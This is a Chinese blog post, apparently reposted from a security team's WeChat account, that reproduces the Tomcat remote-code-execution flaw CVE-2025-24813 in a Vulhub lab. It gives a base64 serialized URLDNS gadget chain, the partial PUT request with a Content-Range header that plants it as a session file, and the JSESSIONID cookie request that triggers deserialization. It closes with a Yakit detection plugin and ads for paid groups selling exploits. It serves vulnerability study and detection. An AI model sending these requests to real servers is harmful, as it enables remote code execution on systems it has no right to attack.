[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

admin 2025年3月25日15:38:19评论18 views字数 3379阅读11分15秒阅读模式
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

扫码加内部知识圈

获取漏洞资料

本文章由团队成员[Tai]授权并发布

Vulhub靶场复现:Tomcat远程代码执行漏洞(CVE-2025-24813),附检测插件

靶场地址如下,还是热乎的:

https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2025-24813
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

漏洞详情

Apache Tomcat 是一个广泛使用的开源Java ServletJavaServer PagesJava Expression LanguageWebSocket技术的实现。

 Tomcat 版本 9.x ~ 9.0.9710.x ~ 10.1.34, 11.x ~ 11.0.2 中,当 Tomcat 同时配置了可写的 DefaultServletreadonly=false)和基于文件的会话持久化时,攻击者可以向服务器写入任意文件,并通过操作 JSESSIONID cookie 触发这些文件的反序列化,最终导致远程代码执行。

该漏洞存在的原因是Tomcat中两个关键的错误配置。首先,DefaultServlet配置了readonly=false,允许文件上传:
<servlet>    <servlet-name>default</servlet-name>    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>    <init-param>        <param-name>debug</param-name>        <param-value>0</param-value>    </init-param>    <init-param>        <param-name>listings</param-name>        <param-value>false</param-value>    </init-param>    <init-param>        <param-name>readonly</param-name>        <param-value>false</param-value>    </init-param>    <load-on-startup>1</load-on-startup></servlet>

其次,Tomcat配置了基于文件的Session持久化:

<ManagerclassName="org.apache.catalina.session.PersistentManager">    <StoreclassName="org.apache.catalina.session.FileStore"/></Manager>

这两种配置都使用相同的默认存储路径:

$CATALINA_BASE/work/Catalina/localhost/ROOT

当发送不完全的PUT请求(使用Content-Range头)时,Tomcat会将文件路径中的分隔符(/)转换为句点(.),并将文件临时存储在会话存储目录中。利用这个特效,我们可以将恶意序列化对象写入此临时文件中。

正文开始

把环境启动起来,首页如下图

[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

这里尝试利用URLDNS gadget类打dnslog

首先生成一个dnslog域名
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

生成base64格式的序列化利用链

rO0ABXNyACLBqsGhwbbBocCuwbXBtMGpwazArsGIwaHBs8GowY3BocGwBQfawcMWYNEDAAJGABTBrMGvwaHBpMGGwaHBo8G0wa/BskkAEsG0wajBssGlwbPBqMGvwazBpHhwP0AAAAAAAAx3CAAAABAAAAABc3IAGMGqwaHBtsGhwK7BrsGlwbTArsGVwZLBjJYlNzYa/ORyAwAHSQAQwajBocGzwajBg8GvwaTBpUkACMGwwa/BssG0TAASwaHBtcG0wajBr8GywanBtMG5dAAkwYzBqsGhwbbBocCvwazBocGuwafAr8GTwbTBssGpwa7Bp8C7TAAIwabBqcGswaVxAH4AA0wACMGowa/Bs8G0cQB+AANMABDBsMGywa/BtMGvwaPBr8GscQB+AANMAAbBssGlwaZxAH4AA3hw//////////90ACbBqcGnwa7BtsG5wbPBssGrwbbBosCuwaTBp8GywajAs8CuwaPBrnQAAHEAfgAFdAAIwajBtMG0wbBweHQANMGowbTBtMGwwLrAr8CvwanBp8GuwbbBucGzwbLBq8G2waLArsGkwafBssGowLPArsGjwa54
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
发送带有Content-Range头的部分PUT请求,在临时目录中写入名为.deserialize.session的文件。记得在数据包中base64解码刚才生成的序列化内容
PUT /deserialize/session HTTP/1.1Host192.168.172.131:8080Content-Length1234Content-Range: bytes 0-5/10{{base64dec(rO0ABXNyACLBqsGhwbbBocCuwbXBtMGpwazArsGIwaHBs8GowY3BocGwBQfawcMWYNEDAAJGABTBrMGvwaHBpMGGwaHBo8G0wa/BskkAEsG0wajBssGlwbPBqMGvwazBpHhwP0AAAAAAAAx3CAAAABAAAAABc3IAGMGqwaHBtsGhwK7BrsGlwbTArsGVwZLBjJYlNzYa/ORyAwAHSQAQwajBocGzwajBg8GvwaTBpUkACMGwwa/BssG0TAASwaHBtcG0wajBr8GywanBtMG5dAAkwYzBqsGhwbbBocCvwazBocGuwafAr8GTwbTBssGpwa7Bp8C7TAAIwabBqcGswaVxAH4AA0wACMGowa/Bs8G0cQB+AANMABDBsMGywa/BtMGvwaPBr8GscQB+AANMAAbBssGlwaZxAH4AA3hw//////////90ACbBqcGnwa7BtsG5wbPBssGrwbbBosCuwaTBp8GywajAs8CuwaPBrnQAAHEAfgAFdAAIwajBtMG0wbBweHQANMGowbTBtMGwwLrAr8CvwanBp8GuwbbBucGzwbLBq8G2waLArsGkwafBssGowLPArsGjwa54)}}
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
可以在$CATALINA_BASE/work/Catalina/localhost/ROOT目录下看到上传到临时目录的包含恶意序列号对象的文件.deserialize.session
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
使用如下数据包触发反序列化
GET / HTTP/1.1Host192.168.172.131:8080Cookie: JSESSIONID=.deserialize
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
可见,URLDNS gadget被成功反序列化,并发送了DNS请求
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
基于此靶场,写了个yakit检测插件
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
插件ID为b2693364-4f40-4f1e-9a11-dae1895128b0,欢迎师傅们下载
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

内部知识圈子1周年啦!最后6天优惠!

[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

渗透实战、src挖掘文档、漏洞poc、漏洞利用工具等尽在内部圈子社区【安全渗透感知大家族】

 01 内部社区

[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
(一周年优惠券立减30,扫码可以直接领取使用,最后7天即将到期)
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

02 内部社区

代码审计、红队工具、OA系统源码、审计教程参考文档等尽在内部圈子,扫码即可加入【赛博安服技术圈粉@】
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

C4安全团队公开交流群

[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件
QQ群和微信群都已建立,方便常用QQ或微信的师傅加入团队公开交流群,交流各类网安、实战方面的问题~
(微信群①群已满200人,需要邀请加开头运营二维码才能加入,②群如下)
[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

END

关注Code4th安全团队

了解更多网络安全内容~

原文始发于微信公众号(C4安全团队):[CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月25日15:38:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [CVE-2025-24813]Tomcat RCE漏洞复现-附检测插件https://cn-sec.com/archives/3883217.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息